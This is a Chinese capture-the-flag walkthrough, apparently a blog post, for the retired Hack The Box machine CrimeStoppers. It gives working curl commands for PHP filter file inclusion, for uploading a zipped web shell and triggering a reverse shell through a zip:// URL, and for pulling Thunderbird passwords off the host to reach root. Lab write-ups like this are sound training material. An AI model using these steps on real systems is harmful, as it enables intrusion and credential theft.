• HTB-靶机-CrimeStoppers


    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.80

    本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

    执行命令 autorecon 10.10.10.80 -o ./CrimeStoppers-autorecon

    扫描结果:

    就开了一个web应用80端口,访问看看

    再看看爆破出来的目录

    都访问了一边发现很多访问的url地址都是类似带?op= 怀疑存在LFI,试了试%00截断进行文件包含,发现目标靶机有防护不能正常利用,经过多次测试和网上的资料确认可以通过php://filter/convert.base64-encode 进行绕过防护任意文件读取,相关参考文章如下:

    https://pure.security/abusing-php-wrappers/

    既然可以读取任意文件,那我们通过读取上面扫描出来的文件,通过分析得出可以上传反弹shell代码然后使用zip的方式执行命令,具体读取方式如下:

    curl -sD - 10.10.10.80/?op=php://filter/convert.base64-encode/resource=index | head -44 | tail -1 | cut -d' ' -f1 | base64 -d > index.php
    curl -sD - 10.10.10.80/?op=php://filter/convert.base64-encode/resource=list | head -44 | tail -1 | cut -d' ' -f1 | base64 -d > list.php
    curl -sD - 10.10.10.80/?op=php://filter/convert.base64-encode/resource=upload | head -44 | tail -1 | cut -d' ' -f1 | base64 -d > upload.php
    curl -sD - 10.10.10.80/?op=php://filter/convert.base64-encode/resource=common | head -44 | tail -1 | cut -d' ' -f1 | base64 -d > common.php

    重点代码:

    上传php反弹shell代码或者上传一句话都可以,这里有两种方式,具体如下:

    1.使用curl参数上传,详细的参数说明请一定要参考官方帮助文档

    获取session和token
    curl -sD - http://10.10.10.80/?op=upload | grep -e PHPSESSID -e 'name="token"'
    如果想查看curl执行的http请求包,可以本地开启burpsuite然后 -x 127.0.0.1:8080
    执行上面会得出下面结果
    
    Set-Cookie: PHPSESSID=0kbemel0dpno38a45r0p5s43u6; path=/
            <input type="text" id="token" name="token" style="display: none" value="3816ad85a500200bc467d4e558a1abf97ce9f87f06a5aefee2d2a5a3d577bfd6" style="355px;" />
    -----------------------------------------------------------------------------------
    
    curl -X POST -sD - -F "tip=<shell1.zip" -F "name=a" -F "token=3816ad85a500200bc467d4e558a1abf97ce9f87f06a5aefee2d2a5a3d577bfd6" -F "submit=Send Tip!" http://10.10.10.80/?op=upload -H "Referer: http://10.10.10.80/?op=upload" -H "Cookie: admin=1; PHPSESSID=0kbemel0dpno38a45r0p5s43u6" | grep Location
    
    上述执行结果如下:
    Location: ?op=view&secretname=5a482dc8883f2861d601f95b7f64b65a7402b1cf
    
    http://10.10.10.80/?op=zip://uploads/10.10.14.5/5a482dc8883f2861d601f95b7f64b65a7402b1cf%23shell1

    上述操作完毕就得到了上传的路径文件,然后可以开始利用了,本地kali监听8833端口,然后触发反弹代码

    成功反弹,这里使用通过curl命令直接反弹shell

    2.使用burpsuite上传小马代码

    这里相对来说,我认为使用burpsuite方式更简单,在使用的时候一定要记得是需要打开burpsuite的拦截模式然后在浏览器页面进行上传,此时burpsuite会拦截上传数据包,然后使用粘贴到文件,此时选择实现打包好的zip文件,完成之后Forward,会获得上传的文件路径,利用即可

    点击Forward即可转发到上传的文件路径

    到了此处就可以像上面curl的演示一样,使用zip命令触发即可,下面就不演示了,跟上面一样,继续下面的旅程,拿到shell之后升级成tty-shell然后翻看了下家目录的所有文件和文件夹,发现一个雷鸟邮件客户端

    经过查询确认可以通过key3.db和logins.json这两个文件来获取密码,使用nc将这两个文件传到本地kali,然后使用开源的工具读取密码,链接地址:https://github.com/lclevy/firepwd

    得出了用户dom的密码是Gummer59 直接su切换过去

    通过读取雷鸟客户端中的邮件内容,确认目标主机存在apache rootkit后门,具体分析参考:https://0xdf.gitlab.io/2018/06/03/htb-crimestoppers.html#apache_modrootme

    最终通过下面方式获取root权限

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    技术沙龙.:主题为《代码解析Castle(IOC)应用实例 -开源CMS 系统Cuyahoga》
    Active Record和Domain Object + Dao
    SNMP++.NET 项目
    微软发布Windows Vista Tips and Tricks网站
    2007 Office System Video
    使用搜索引擎搜索结果
    我购买了一台acer笔记本
    有价值的杂志《MSDN杂志》中文版
    Spring2.0中文参考手册(中文版) [转自CSDN论坛]
    开源项目Generics.Net介绍
  • 原文地址:https://www.cnblogs.com/autopwn/p/14072832.html
Copyright © 2020-2023  润新知